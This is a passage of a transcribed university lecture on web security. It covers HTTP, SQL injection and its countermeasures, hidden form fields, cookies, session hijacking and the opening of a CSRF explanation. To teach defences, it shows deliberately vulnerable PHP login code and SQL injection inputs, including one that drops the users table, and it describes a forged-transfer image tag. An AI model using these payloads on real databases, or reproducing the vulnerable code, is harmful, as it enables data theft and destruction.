Security for the Web - Introduction
So far, we have focused on programs written in C and C++. We've examined how vulnerabilities in programs written in these languages can lead to attacks that violate memory safety, resulting in remote code injection or theft of sensitive data, and we've looked at various defenses against these attacks. One effective defense is to use a memory-safe programming language. In this unit, we turn our attention to internet security, focusing on applications that are part of the World Wide Web. While many web applications are implemented in type-safe languages and thus avoid memory safety issues, they have their own sets of problems. These problems go by names like SQL injection, cross-site scripting, cross-site request forgery, and session hijacking. Interestingly, the issues underlying web vulnerabilities are sometimes very similar to memory vulnerabilities. For example, SQL injection and cross-site scripting arise because, like buffer overflows, the application's failure to properly validate its input results in it treating data as if it were code. The modern web, sometimes called Web 2.0, brings in the additional complication of mobile code. In particular, when you visit a website, code from that site will be silently downloaded to your machine and then run. How do you ensure that this code does not violate the security of other programs running in your browser or on your machine? The outline for this unit is as follows. First, we will look into the technical details of the basic World Wide Web. We will see how typical web applications are structured at the client and at the server. We'll examine HTTP, the hypertext transfer protocol, which clients and servers use to communicate, and we'll see how improper interaction with the database on the server can enable an attack called SQL injection. Next, we'll look at how web applications implement ephemeral, that is, short-lived, non-persistent state. Such state is useful during a long-lived session. Typically, ephemeral state is implemented using hidden form fields and cookies. Unfortunately, sloppy use of these features can lead to attacks such as session hijacking and cross-site request forgery, or CSRF. With these attacks, an adversary can take over a user's account or manipulate an application to act for that user, but in the adversary's interests. Finally, we'll look at so-called Web 2.0, which characterizes the modern web. The modern web makes heavy use of mobile code, often written in the language JavaScript. JavaScript programs originate at a server but run at the client. Running code at the client creates new possibilities for attack, one of which is called cross-site scripting, or XSS. With XSS, a user is tricked into running code he thinks is from a trusted website, but in fact it's from a malicious source. Throughout the unit we will look at various defenses against these attacks. One common theme of all of the defenses should be familiar: validate your input. So, let's begin by looking at the basics of Web 1.0.
Web Basics
So let's begin by going over the basics of the World Wide Web. The web consists, roughly speaking, of two sorts of participants, clients and servers, which interact with one another. Clients are things like laptops, desktops, and mobile phones, all of which are interested in content provided by servers, which are things like shopping websites (Amazon, for example), information websites (Wikipedia), blogs, and so on. The client runs a browser, like Internet Explorer, Chrome, or Firefox, and the server runs a web server to serve the content; web servers include Apache httpd, nginx, Microsoft's IIS, and so on. The server often maintains a database that keeps track of the information it's serving, and the client might also maintain private data relevant to the interaction it's having with the server over the web. The database is often a separate entity, logically and sometimes even physically; it might be a database management system such as MySQL, Postgres, or SQL Server. Much of the user data is stored as part of the browser, or in files that the browser later has access to. The browser interacts with the web server via what's called a uniform resource locator, or URL. Here we see one: the URL for my home page at the University of Maryland. The first part of the URL is the protocol, here http, which we'll talk about in a minute. The second part is the address of the host that is serving the content, that is, where on the internet the server is. It is translated into an internet protocol, or IP, address by the domain name service, or DNS. So when the user types in www.cs.umd.edu, this name is provided to DNS, which looks it up and returns an IP address, which is just a 32-bit integer; in this case it's 128.8.127.3. With this information, the browser knows that it should connect to this internet address using the HTTP protocol. The remaining part of the URL is the path to the particular resource that the client wants the server to provide. Here the path ends in index.html, and that last part, index.html, is a file. It's static content, because of the .html suffix: the server is just going to retrieve this file and return it to the client. Because it's hypertext, HTML, the browser will render the file on the screen, and the user can interact with it, clicking on links, filling in forms, and so on. Another URL might have a different path ending in a different file, say delete.php, and the content at that path is determined differently. delete.php is a program written in the PHP programming language, and the content is determined by running the program. PHP runs at the server, and it will query the database to acquire information. So if the database changes because other users interact with it, then the next time you go to delete.php, you might get different content shown in your browser. This is a dynamically generated page: content that's created on the fly. Sometimes URLs also have what are called arguments, which direct how the server produces the page that is ultimately returned to the client. Here we have a couple of arguments: f, which is set to joe123, and w, which is set to 16.
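To make the idea of dynamic content concrete, here is a minimal PHP sketch of what a script like delete.php might do with those arguments. The parameter handling follows the description above, but the details are hypothetical, not taken from the actual page.

    <?php
      // delete.php (hypothetical sketch): read the URL arguments ?f=joe123&w=16
      $f = $_GET['f'];   // e.g., which user's data to operate on
      $w = $_GET['w'];   // e.g., which item number
      // ... here the script would consult the database using $f and $w ...
      // The HTML it prints depends on what the database currently contains,
      // which is why the page is "dynamic".
      echo "<html><body><p>Done.</p></body></html>";
    ?>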
The browser communicates with the web server using the protocol specified in the URL. The most common one, and the one we'll focus on, is HTTP, which stands for hypertext transfer protocol. It's a so-called application-layer protocol in the OSI network stack, and it runs on top of TCP, the transmission control protocol, which can exchange data reliably across a network, even an unreliable one. What happens is that a user viewing a web page might click on it, and as a result an HTTP request is sent to the server specified in the URL associated with that click. The URL is accompanied by headers in the actual HTTP request, and we'll look at those in a moment. There are two types of requests, GET and POST. In a GET request, all of the data is in the URL itself, this data being what determines which file or content is returned. Importantly, a GET will not change the contents of data stored on the server; it will only cause those contents to produce a page that is sent back to the client. A POST, on the other hand, which can happen by filling in a form and then submitting it, may allow the server's state to be changed. In other words, it may have side effects. Here's an example of an HTTP GET request, in this case to reddit.com. At the very top we see the URL and, most importantly, the first two lines say that it's a GET request for the /r/security path, using HTTP version 1.1, and that it's getting it from the host www.reddit.com. Another interesting header shown here is the User-Agent field, which typically identifies the browser. The server can use this, for example, to provide content that depends on the browser: when you go to download an open source program and the site knows you're running on a Mac, it knows this by looking at the User-Agent field in the header. Now suppose we are at this site, we follow that link, the content is shown in our browser, and we want to click on the "worst DDoS attack of all time" link shown here. When we do that, it will generate an HTTP request that goes to zdnet.com and gets the URL we clicked on. Notice something different from the last set of headers we looked at: there's a so-called Referer field, which indicates the web page that was clicked on in order to generate the current HTTP request. This can be useful for the server to know whether the request was generated from content it produced, rather than from a URL somebody just typed into the browser. This does have security ramifications, which we'll look at a bit later. Now let's look at an HTTP POST request. Here we're posting on a site called piazza.com, a course management site that allows you to have online discussions and so on. We can see that the request at the very top has POST as the request type, along with the URL again, and the host is piazza.com. Much of the rest of the request looks similar. Here's one part that's different: the very end includes data that is explicitly part of the request content. For example, this part of the request might be populated by form fields that are filled in by a user, say when responding to a discussion post.
Here, at the very right, you can see a bit of HTML that someone might have typed into a text box, which then got included in this POST request when they clicked submit. On the other hand, you can still also have content included in the URL, just as you might for a GET request. Once you've submitted a request, you're going to get back a response that the browser is going to render. What does the response look like? Well, it will contain a status code, some headers, and then the data. It may also contain some cookies. We'll talk a lot more about cookies later, but roughly speaking, they represent state that the server would like the browser to store on its behalf, to help maintain the notion of a session, or other sorts of memories the server would like to have about its interactions with the client later on. Here's an example response. At the very top we can see the HTTP version, the status code, and the reason phrase. Here the status was 200, which means the server could find the page we asked for, hence OK for the reason phrase. Then come a whole bunch of headers, and finally the data at the very end. You can see Set-Cookie as part of the headers; these are those cookies I was speaking about before. And you can see things like Content-Type: text/html, which indicates the type of the data being provided. The browser can then use this content type to know what to do with the data, that is, how to render it in the user's browser window.
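Putting the pieces together, here is a rough sketch of what such a GET exchange might look like on the wire. The header values are illustrative only, not the exact ones from the example just described.

    GET /r/security HTTP/1.1
    Host: www.reddit.com
    User-Agent: Mozilla/5.0 (Macintosh)
    Referer: http://www.reddit.com/

    HTTP/1.1 200 OK
    Set-Cookie: session=abc123; Path=/; Domain=.reddit.com
    Content-Type: text/html

    <html> ...the page data... </html>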
SQL Injection
In a web application, the persistent, or long-lived, data resides in the database: things like personnel records, credit card numbers, or online inventories. Of course, this sort of data needs to be protected from illicit access and tampering. Even web applications that recognize this and do try to protect it sometimes fail, because of a bug that allows a very clever sort of attack called a SQL injection. In this unit we're going to look at that attack, but to do so, we first have to talk about how data tends to be managed, and how it's accessed using a special language called SQL. Typically, for an online server application, we want to support ACID transactions on our persistent, long-lived data. What's a transaction? It might be a transfer from one bank account to another, or a purchase of an item from an online store. The A in ACID stands for atomicity, which is to say that transactions should complete entirely or not at all. You should either completely purchase the book or not purchase it, but you shouldn't pay the money and then not receive the book. Likewise, if you transfer $100 from bank account A to bank account B, you should not withdraw the $100 from account A but then fail to deposit it in account B. Consistency means that the database is always in a valid state: as far as other concurrent queriers of the database are concerned, all of the data is in the state you expect. Intermediate states of transactions, like "I've withdrawn the money from one account but not yet put it in the other," should not be visible. Isolation says that the results of a transaction aren't visible until the whole atomic operation completes. And finally, durability: once a transaction is committed, it should be persistent, that is, durable. Even if there's a power failure or some other sort of failure, the effects of that transaction should persist. Achieving ACID transactions is no easy feat. Fortunately, the research community and industry have done a great job over the last three or four decades putting together systems called database management systems, or DBMSes, for managing data and supporting transactions on that data while providing the ACID properties. A common way of storing data is in tables, which are accessed using the Structured Query Language, or SQL. Here on this slide we have an example of a table. The name of the table is users, and the table consists of a bunch of records, where each field of a record is referred to as a column. Each record is a 5-tuple with the fields name, gender, age, email, and password, and there are four records stored in the users table. We can use SQL to read from this database and to write to it, updating it in various ways, using different SQL commands. The most common SQL command is probably SELECT, which gives you a way of querying the contents of a database. This particular SELECT says: look at the age field in the users table, and select it from all records whose name is D. Looking at the name column to find the users whose name is D and then selecting out the age column from those records, the answer in this case would be 28. Another SQL command is UPDATE, which gives us a way to modify records that are already in the database.
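Written out, the statements discussed here and just below would look roughly as follows. They are reconstructed from the description, so the exact values in the INSERT (email, password) are made up for illustration.

    SELECT age FROM users WHERE name = 'D';                         -- returns 28
    UPDATE users SET email = 'readgood@pp.com' WHERE age = 32;
    INSERT INTO users VALUES ('Frank', 'M', 57, 'frank@example.com', 'secret');
    DROP TABLE users;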
This UPDATE command says we want to set the email address of all users whose age is 32 to readgood@pp.com. If we look at the users table for users whose age is 32, there is only one, the third record, Charlie, and so we should update the email address of that record to be readgood@pp.com. Another command is INSERT, which gives you a way to add new records to the table; here we're inserting a record for Frank, who's male and 57, and so on. Finally, there's the DROP command, which gives you a way of removing data from the database; here we show how DROP can be used to delete an entire table. Now, server-side code interacts with the database using SQL, and one common way that server-side code is written is in a language called PHP. PHP looks like a hybrid of HTML, the standard markup language for rendering web pages, along with some extra code that allows the PHP program to query the database and substitute the results of that query into variables that are eventually rendered. This is a very convenient and popular way of generating dynamic content: ask the database questions and put the results into the generated web page. Here on the slide we see a couple of fields, username and password, and a button. We can suppose that when the user clicks the login button, he will have filled in the username and password fields, and these will have been included as arguments sent along with the HTTP POST request. So let's suppose a user types in their username and password and sends that information along. That information is going to end up in the $user and $pass variables shown in the PHP code. What is that code doing? Well, the query it constructs is going to SELECT * FROM users, that is, consider every user in the users table, WHERE the user's name is the username that was typed in AND the password is the given password.
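Here is a minimal PHP sketch of the vulnerable login check being described. It follows the structure given in the lecture, but the connection setup is omitted and details like the result handling are filled in as plausible assumptions rather than copied from the actual slide.

    <?php
      // Values supplied by the login form (attacker-controlled!)
      $user = $_POST['user'];
      $pass = $_POST['pass'];

      // VULNERABLE: the user-supplied strings are pasted directly into the query text.
      $query = "SELECT * FROM users WHERE (name='$user' AND password='$pass');";
      $result = mysql_query($query);

      if ($result && mysql_num_rows($result) > 0) {
        echo "Login successful";   // at least one matching user was found
      } else {
        echo "Login failed";
      }
    ?>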
Now suppose you can fill in that user field however you like. The question is, could you exploit this situation by being clever about what the user field contains? In this particular case, the code is vulnerable to a SQL injection. How? Suppose we fill in the user field with this data: frank' OR 1=1); -- . This text is going to be substituted in for the $user variable inside the query that's being constructed as a string in the mysql_query call to the database. After substitution, the string contains frank and the closing quote spliced in for the user, along with everything else: the OR 1=1, the closing parenthesis, the semicolon, and the two dashes. Because of the way the string is constructed, we've effectively modified the query that's going to be sent to the database. The frank' closes off the user name, as if the user were frank, and the OR 1=1 becomes another element of the query's WHERE clause. The dash dash begins a comment, which causes the SQL interpreter on the database to ignore the AND password = portion of the query. What's this query going to do in the end? It's going to select every user whose name is frank or for whom 1 equals 1. Well, 1 always equals 1, so this query will always succeed, and effectively it will return the entire contents of the users table. You can even chain together statements with a semicolon, here by adding ; DROP TABLE users; -- . Once we substitute that in, we'll do the SELECT to grab all the records from the database and print them out, and then we will delete the table by executing DROP TABLE users. This is very bad. A very obvious way of coding things, just splicing in the user name and the password, has opened us up to the possibility that malicious input can effectively change the form of the query, causing private information to be returned or sensitive and important information to be deleted. SQL injection attacks are quite common. They're less common than they were a while back, but they're still a significant source of vulnerabilities. At this point you should know enough to understand this xkcd comic. The great thing about the comic is that at the very end it indicates the solution to the problem, a solution we've seen many times before: sanitize your database inputs to prevent these sorts of injection attacks from taking place. In fact, that is exactly what we'll look at in the next unit.
SQL Injection Countermeasures
All right. If we're going to understand how to defend against SQL injection attacks, we have to understand the underlying issue that makes those attacks possible, and that issue is the following: one string combines code and data. This is similar to what happens with buffer overflows. When a user types in more characters than a buffer can hold, then in an attack like stack smashing, those extra characters will overrun the buffer's contents and corrupt control-flow data, like the return address or function pointers, which can then manipulate what the program does. In the same way, the code and data boundary is blurred in a SQL injection: in a sense, we're overflowing the contents of that user field and inserting new code to change the structure of the query. In general, when the boundary between code and data blurs, we open ourselves up to vulnerabilities. We can see the underlying issue by viewing the SQL query that we intend as a parse tree. If you look at that query, you can see that a SELECT statement basically has three parts: first, what to select, in this case *, that is, all columns; second, which table, in this case the users table; and third, the WHERE clause that refines which records should be considered. We represent that here as a tree whose root node indicates the SELECT command, and the three children of that node are those three elements of the command: * (what to select), users (which table), and finally the WHERE clause (which records). Now, the WHERE clause itself can be deconstructed into a tree. It's basically the conjunction of two equalities: it says that the name field of the records selected from users should be equal to the $user contents, and likewise the password field, that is, the password column, should be equal to $pass. These should be data and not code. That's our intention: whatever we stick here is supposed to be a string that's checked for equality against name. Unfortunately, by the way we're constructing this query, a clever input like frank' OR 1=1 will actually create a different parse tree, and that's what we want to stop. We hinted a moment ago, at the end of the last unit, that we should stop it using input validation. We should check user input to make sure it adheres to the form we expect, and therefore only use data that's trustworthy. We can validate data in two ways: we can check that it has the expected form, or we can sanitize it by modifying it, or using it in such a way, that the result is correctly formed by construction. One kind of sanitization is blacklisting, and one kind of blacklisting is to delete the characters you don't want. A blacklist is a list of bad things, so what we could do is look in the input for these bad things and delete them. What are some bad things we could delete? Well, we could delete the quote or the semicolon or the dash dash, because those were important elements of the SQL injection attack. Unfortunately, this is not going to work in some cases, namely when those characters have meaning in reasonable contexts, like the name Peter O'Connor. Another kind of sanitization is called escaping. Instead of deleting problematic characters, escaping would have you change them to be safe ones instead.
So here we could escape the quote, the semicolon, the dashes, and so on with escaped versions that won't be interpreted in a control-flow-changing way in the constructed query. You can do this using libraries provided in the various frameworks you might program in, like PHP. The downside is that you may actually want some of these characters in your SQL, and in that case this approach is not going to work. Now, on the checking side, you could use a whitelist to check that the input is reasonable, and simply reject it if it's not. We saw this in C programming, for example: you can make sure that an integer is within the correct range, say that a length specified by the user is no greater than the actual length of the buffer it refers to, and otherwise reject the input. The idea here is that it's safer to reject an input than it is to fix it, because a fix may actually produce the wrong output; an attacker can manipulate the attempt to sanitize something so that the result is corrupted to suit his needs. This follows the principle of fail-safe defaults: do the simplest thing and reject the rest. We'll look at that principle in more depth later on. It turns out that whitelisting can sometimes be hard, because it's hard to specify what the whitelist should be. For example, if you only want to allow reasonable first names, how do you know what the reasonable first names are? Will you provide a specific dictionary that needs to be iterated through to check the names against? That could be both expensive and difficult to get right. So for SQL injection in particular, the preferred solution is to use what are called prepared statements. The idea here is to treat user data according to a type, thereby decoupling the use of strings as code from the use of strings as data. Here's our query again, and here's the same query expressed as a prepared statement. The first line creates a handle to the database, and the second line creates a prepared statement template. You can see that this very much resembles the string we were constructing before, but the prepared statement includes everything other than the parts that are to be filled in, and those it designates with question marks. The filling-in comes as a separate step, happening with the bind_param call. The bind_param call takes a format string, which specifies how many arguments are to follow and what their types are. The statement has two question marks, so it expects two arguments, and therefore the format string has two format specifiers, here "ss", where s stands for string. So when user and pass are substituted into the statement created by the prepared statement, they will be treated as strings and not misinterpreted as code, and then the query can be sent to the database. We bind the variables, we type them, and as such we have decoupled compilation, that is, specifying the template, from the binding of the data. Using a prepared statement, we would replace the original query shown above with this one. The binding is only applied to the leaves of the parse tree, leaving the structure of the tree fixed.
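In PHP with mysqli, the prepared-statement version being described might look roughly like this. The connection parameters are placeholders, and the exact code on the slide may differ slightly.

    <?php
      // Create a handle to the database (placeholder credentials).
      $db = new mysqli("localhost", "app_user", "app_password", "mydb");

      // The template: the parts to be filled in are marked with '?', not spliced in.
      $stmt = $db->prepare("SELECT * FROM users WHERE name = ? AND password = ?");

      // Bind the data to the template: "ss" says both parameters are strings,
      // so whatever they contain can never change the structure of the query.
      // ($user and $pass hold the submitted form values, as before.)
      $stmt->bind_param("ss", $user, $pass);

      $stmt->execute();
      $result = $stmt->get_result();
      if ($result->num_rows > 0) {
        echo "Login successful";
      }
    ?>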
So if we had filled in the user name with frank' OR 1=1 as we did in the beginning, it would be fine, because it would not change the structure of the query. It would simply be an odd user name to be looking up in the database. Now, prepared statements make it possible to eliminate many SQL injection attacks, but sometimes queries are complicated and mistakes can be made. So you have reason to want defense in depth, to mitigate the impact of a SQL injection should it happen. One way to do that is to limit privileges, that is, to reduce the power of an exploitation by not allowing the server application to do anything it wants when accessing the database. For example, when you connect to the database, you can indicate that only certain commands should be allowed, say only SELECT queries on the Orders_Table, but not on the Creditcards_Table. You can also choose to encrypt sensitive data stored in the database, so that if the database is somehow stolen, that data is less useful. You may not need to encrypt some of the tables, like the Orders_Table. When encrypted data is selected from the database, it is then decrypted inside the server application using a key or a smartcard or some other sort of mechanism, but while it's stored in the database at rest, it's encrypted.
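As a rough illustration of the privilege-limiting idea mentioned above, in MySQL the account the web application connects as could be granted only the rights it needs. The database and account names here are hypothetical; only the table names come from the example above.

    -- Allow the web application's database account to run SELECT queries
    -- on the orders table...
    GRANT SELECT ON shop.Orders_Table TO 'webapp'@'localhost';
    -- ...but grant it nothing on Creditcards_Table, so even an injected query
    -- issued through this account cannot read or drop that table.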
Web-based State Using Hidden Fields and Cookies
What we have seen so far has been pretty simple in terms of interactions: the client sends a message and the server responds. But what about multi-message interactions that might be part of a longer session? In particular, perhaps from your own experience, you are used to a session lifetime in which the client connects, the client sends a request, the server responds, the client issues another request whose content is based on the server's prior response, the server responds again, and so on, until finally the client disconnects. Given this experience, you may be interested to know that HTTP has no notion of state or memory. Each request-response pair is completely independent at the protocol level. At the least, this should make you wonder: how is it that I don't have to provide login credentials with each request, so that the server knows it's me each time? The answer is that web applications themselves keep track of the relationship between requests and responses in a session. They do this by maintaining bits of state that relate the requests one to the next. Next, we'll look at how this is done. In addition to the long-lived state stored in the database at the server, things like credit card numbers, user account information, and inventory, the web application will maintain ephemeral state that aids the server's processing while a client is interacting with it. This is not long-lived state that must be durable; instead, it keeps track of what a client is doing during an interaction, to relate one request to the next. In order to maintain this state on the client rather than the server, the server will actually send an encoding of it back with each response, and the client can then return that state to the server when it makes its subsequent requests. There are two ways we can implement things this way. One is to use hidden fields in the HTML documents that the server generates, and the other is to use something called cookies. Let's look at hidden form fields using an example for an online store. Here on the left we see a web page from socks.com, the order.php page. Suppose the user has decided to buy this pair of socks for $5.50 and clicks the Order button. The server will receive that request and send a page in response, and notice that this page says the order is $5.50. The user is going to confirm that order. Now the question is: how will the server relate the $5.50 price from the first page to the confirmation, so that when the user clicks the Yes button on the second page, the server makes the right order? Because HTTP is stateless, it's not remembering, technically speaking, from one interaction to the next. The answer is that the server can embed this information, for example the cost of the socks, in the web page that it responds with, that is, the pay.php page. Here it is, presented to the user, and notice that it contains what's called a hidden form field. A form is just an HTML element that has a button associated with it that will produce a web request. There are two non-hidden form values, yes and no, shown at the bottom of this HTML code (value yes, value no), and then there's the hidden one, with value 5.50. This hidden value will get sent with the request when the user presses the button.
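The confirmation page's form might look roughly like the following sketch. The field names pay and price follow the description in the lecture, but the action URL and exact markup are guesses.

    <form action="submit_order.php" method="POST">
      The total cost is $5.50. Confirm order?
      <input type="hidden" name="price" value="5.50">
      <input type="submit" name="pay" value="yes">
      <input type="submit" name="pay" value="no">
    </form>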
Now, here's the PHP code on the backend at the web server that will receive this web request. It pulls out the form field values: pay, indicating that this was a pay request, and price. As long as the price is not null, it will debit the credit card that amount and deliver the socks. Here's the problem, though: price comes from the user. It's filled in by that form field value. Because the HTML is sent to the user, a clever and malicious user can change the value to be something far less than the vendor intended, and thereby corrupt the computation. We can get around that problem by using hidden form fields of a special variety that we call capabilities. The server will maintain trusted state: instead of sending the state to the client, the server will keep track of the state itself, but it will index that state by a capability that gives the client access to it. And what is a capability? A capability is a right: a piece of data that gives a client who possesses it the right to perform some action, and that capability should be unforgeable. By definition, that would prevent us from waging the attack we saw before, in which the client was able to change the price. Because the capability is intended to be, and should be, unforgeable, the client will not be able to change it so as to effectively change the price. Given that capability, the client will reference it in subsequent requests, and thereby be able to access the state. To make capabilities unforgeable, a typical approach is to make them large random numbers, so that they are difficult to guess: if a client does attempt to make a guess, it is very unlikely to find a number that corresponds to a real capability, and therefore the guess has no power. So here's what the page looked like before, and here's how we might change it to use capabilities instead. Now the hidden field's name is sid, and its value is a random number serving as the capability. On the server side, we modify the code to look up the sid to find the price. Only if the sid is legal will the price be present, in which case we'll bill the credit card; if it's not there, we go to the else case and cancel the transaction.
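A minimal PHP sketch of that server-side check might look like this. The helper functions are hypothetical, since the slide's exact code isn't shown in the transcript; the point is that the trusted price is looked up on the server, never taken from the client.

    <?php
      // The sid was generated as a large random number when the order page was
      // built, and the real price was stored server-side under that sid.
      $sid = $_POST['sid'];
      $price = lookup_pending_order($sid);   // hypothetical helper: consults
                                             // trusted server-side storage
      if ($price !== null) {
        // Legal sid: bill the trusted, server-stored price.
        bill_credit_card($price);            // hypothetical helper
        deliver_socks();                     // hypothetical helper
      } else {
        // Unknown or forged sid: cancel the transaction.
        echo "Order cancelled";
      }
    ?>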
Capabilities of this sort can take us quite a long way, but they aren't perfect. We don't like to have to pass around hidden fields all the time; it complicates the interaction amongst all the pages, and it's difficult to put together a web application that way. It also has the big drawback that if you ever close the browser window, you throw away the HTML that contained the hidden form fields, and therefore if you reopen your browser and reconnect to the site, all memory of your prior interaction is gone. We can solve these problems by using what are called cookies. Just like with capabilities, the server will maintain some trusted state, and that state will be indexed by a cookie rather than a capability. Just as with hidden form fields, the server will send cookies along with its responses, and the client will store them locally. When the client reconnects to the server, it will send the cookies along with its requests. But instead of being embedded in an HTML page, cookies are sent around as part of the HTTP protocol and stored on disk in an area associated with the browser, so it doesn't matter if you close the page, and it doesn't matter exactly what's on the page during the interaction. Here's an example HTTP response that contains cookies. Many of the headers, as we can see here, have the form Set-Cookie, and what follows is key=value, indicating that the cookie named key is associated with the given value, followed by a bunch of options that specify things like timeouts and paths and hosts and so on. Let's dig into this example in further detail. The client receives that HTTP response, sees a Set-Cookie header, and processes it. The key is edition and the value is US. The options for that cookie say that the value expires as of the given date, perhaps when the session expires, and that the cookie is associated with the domain zdnet.com and with URLs at that domain whose path begins with /. In short, whenever a client interacts with the server via the browser, if the interaction is with the given domain and a URL with a prefix of the given path, then this cookie should be sent along with that HTTP request. In particular, here is the HTTP response that was received by the client; we see a bunch of cookies being set. In a subsequent visit, notice we're visiting zdnet.com and the root directory, and at the very bottom we see the header that provides the session zdnet production cookie and includes its value. You can see that this matches the value given on the last line of the response at the top. It's followed by another cookie, zd region, with further data that's again shown at the top, and so on. All the cookies that are relevant are provided along with the request. There are several reasons that web applications use cookies. The most common use, as we've hinted at already, is for a cookie to act as a session identifier. Basically, after the user logs in as part of a POST request, the application sends a cookie in response that identifies the user. The cookie is sent in subsequent requests to the same web application, so that it can silently authenticate the user each time. The human user, of course, is unaware that this is happening and interacts naturally with the system. Another use of cookies is personalization. Shopping websites, for example, are interested in showing you things that you are interested in, and they can figure out your interests based on past interactions. Based on these observations, a site can create a cookie that identifies various interests. This cookie can be used to prioritize the display of various elements of the site, effectively personalizing the site to you. Personalization can even go to the level of font choices and other superficial elements of the display. The nice thing is that these cookies can be anonymous: such preferences are not security-sensitive, at least from the site's point of view, and so no authentication of the particular user is needed. Of course, the flip side to personalization is tracking. Instead of personalization cookies being used only by a particular site, they can be made available to other interested parties, like advertising networks. How can this work, given that cookies should only be visible to the site that created them? One way is the following. Site A uses advertising network B to show an ad. When B receives the request from your browser to show the ad, it can figure out that the ad was displayed when visiting site A. How?
Well, by looking at the Referer attribute of the HTTP request, for example the request to fetch an image. Site B would like to associate you with a list of the sites, and the pages on them, that you tend to visit, and in this case it would like to include site A. One way it could do this is to maintain a list in a database mapping IP addresses to site lists. The idea would be that you are associated with a particular IP address, and the list is then associated with that address and therefore with you. But doing this isn't so reliable, because you are not associated solely with one IP address, and in fact different people might use the same address. Instead, what will happen is that the ad network will store the site list as a cookie on your machine. This cookie is called a third-party cookie, because it is associated with site B but was created when visiting site A. This way, when you visit other sites that happen to use the same ad network, the ad network's cookie will be accessible to the ad. It can then add the current site to the cookie. It can even customize the ad it shows based on previously visited sites, which reveal your interests. Now, one way to prevent this sort of thing is to disable third-party cookies, but this method is not perfect, thanks to the ability to otherwise fingerprint your browser. That's a topic for another time, though. Let's get back to considering session cookies and how we can protect them.
Session Hijacking
As we've already mentioned, an extremely common use of cookies is as session identifiers, which associate a user with a multi-interaction session with a website. The basic idea is simple. The user first logs into the website, for example using a username and password. On successful login, the server sends back a session cookie with the response. Subsequent requests to the same site will also send along that session cookie, either in an HTTP header or explicitly included in a hidden field. At this point, the server knows who it's talking to. This approach makes the session cookie a prized commodity for attackers. In effect, a session cookie is a capability to access a site with the credentials of a particular user. Thus, this capability needs to be protected from theft; otherwise, an attacker can impersonate the user and perform actions on her behalf. Such actions could result in lost or corrupted data, like your bank account balance. To see how theft could happen, consider where cookies show up in an interaction. First, they are generated and possibly stored at a server. Then, they are transmitted between the server and client and back again. Finally, they are stored at the client for later use. As such, cookies could be stolen by compromising either the server or the client and copying them. Or, if the server's algorithm for generating cookies is known, an adversary could predict what a particular user's cookie is. Cookies could also be copied by sniffing the network to observe them in transit, or the network could be manipulated into sending the cookies to an adversary directly, using techniques like DNS cache poisoning. Cookie release due to compromise can be prevented by building more resilient clients, servers, and DNS caches; in other words, avoid buffer overruns and the other sorts of errors we've already seen. Cookie release due to sniffing can be avoided by using encrypted connections. In particular, sensitive interactions after a login should use secure HTTP, called HTTPS, which encrypts the communications, including the cookies. In fact, by setting the Secure attribute of a cookie, you can ensure it will only be sent over HTTPS, and never over plain HTTP. This fail-safe prevents a coding mistake from inadvertently revealing a session cookie. To avoid allowing the adversary to guess what a cookie will be, applications should generate cookies that are long, so that there are many possibilities for the adversary to try, and random, so that any particular value is hard to predict. Note that the same guidelines should hold for generating SIDs in hidden form fields.
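Putting these guidelines together, here is a hedged PHP sketch of issuing such a session cookie: long, random, and marked Secure, with an expiration time that anticipates a defense discussed just below. The storage helper is hypothetical, and a real application would typically lean on a framework's session support instead.

    <?php
      // Generate a long, random, hard-to-guess session identifier.
      $sid = bin2hex(random_bytes(32));   // 256 bits of randomness

      // Remember server-side which user this sid belongs to and when it expires.
      store_session($sid, $logged_in_user, time() + 3600);   // hypothetical helper

      // Send it to the browser.
      setcookie("session", $sid, [
        'expires'  => time() + 3600,
        'path'     => '/',
        'secure'   => true,     // never sent over plain HTTP
        'httponly' => true,     // commonly also set, so page scripts can't read it
      ]);
    ?>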
Now if, despite these protections, a cookie is stolen, session hijacking can be further defended against by not using only cookies to identify a user's session. Instead, you can build your application to require correlating information on the site that identifies the user's current interaction. For example, if the user is currently looking at a web page that shows his bank accounts, but then a request comes in asking for a transfer, the website should be able to tell that the request is not valid. This can be done by storing hidden fields on pages, or by using the Referer attribute, so that impossible requests are rejected even when they come with a proper cookie. This same sort of protection is used against CSRF attacks, which we will discuss shortly. There are yet more mitigations against attacks due to stolen cookies. To motivate them, consider a recent Twitter vulnerability. Twitter used a single cookie, called auth_token, to identify a user, and this cookie was computed from the username and password. This approach suffers from two weaknesses. First, the auth_token does not change from session to session. Second, it does not become invalid when the user logs out. This means that stealing the cookie gives an attacker indefinite hijacking of a user's account. Now, the defenses we've already discussed can reduce the chance that a cookie is stolen or that it is used inappropriately, but there are two more defenses we can add. First, do not allow session cookies to live on indefinitely: they should have an expiration date, like the expiration date on your credit card, after which they cannot be used. The other defense is to direct a cookie to be deleted from the user's machine and from the server once a session ends. This reduces the time that a cookie is exposed to possible theft due to compromise. Finally, let us consider a non-defense. You might think that you can neuter an attack by tying a session to a particular IP address: the user logs in from one machine, and if a request comes from some other machine, it must be bogus and should be rejected. This defense will work most of the time, but there are sufficient problems with it that it is not usually deployed. In particular, a user's IP address might legitimately change during a session. A mobile device could legitimately roam between networks, or be forced to renegotiate an address using the DHCP protocol for other reasons. In these cases, a user would suddenly be denied access. In addition to these false positives, relying only on network addresses will miss some attacks, too. One example is when a user's machine is behind a Network Address Translator, or NAT, device. Hosts beyond the NAT box will view all clients behind it as having the same address; the NAT box internally translates this address into different local addresses. As such, in a setting like an internet cafe, it's not unlikely that all machines in the cafe will have the same external address, and so one machine in the cafe could hijack a session of another machine in the same cafe, for example by sniffing the network. Once again, the right defense here is to protect the session identifier. Next, we'll look at a related form of attack called cross-site request forgery, or CSRF, that requires similar and complementary defenses.
Cross-site Request Forgery - CSRF
Recall the two main kinds of web request: GET and POST. GET requests are meant to be reads of the server state; as such, they are not intended to effect modifications to that state. Nevertheless, they often do just that. With this in mind, consider the URL to the banking website shown here, and suppose a user is logged into this site with an active session. What if an attacker is able to trick the user into visiting this link? The outcome for the user is not good: an unintended bank transfer out of his account. The question is, what would convince a user to visit this link? Here's how this could happen. Suppose the client is logged into the banking website and, at the same time, is surfing the internet and ends up at attacker.com. attacker.com returns a page to the user, and that page contains an image tag whose source is the URL we saw before. The browser, upon seeing the image tag, will automatically visit the URL to obtain what it believes will be an image. So it will go to bank.com and send the request. Normally, if the user were not logged into the banking website, bank.com would reject the request, because the user was not authenticated. But if the user happens to be logged in at the same time as visiting attacker.com, then this request will be accompanied by the session cookie that says the user is authenticated, and as a result bank.com will dutifully perform the request. This kind of misdirection attack is called a cross-site request forgery, or CSRF. The target of the attack is a user with an account on a vulnerable server. The goal of the attack is to issue requests on the user's behalf that look to the server to be legitimate. To ensure legitimacy, the requests are issued from the user's browser, which will send along the needed 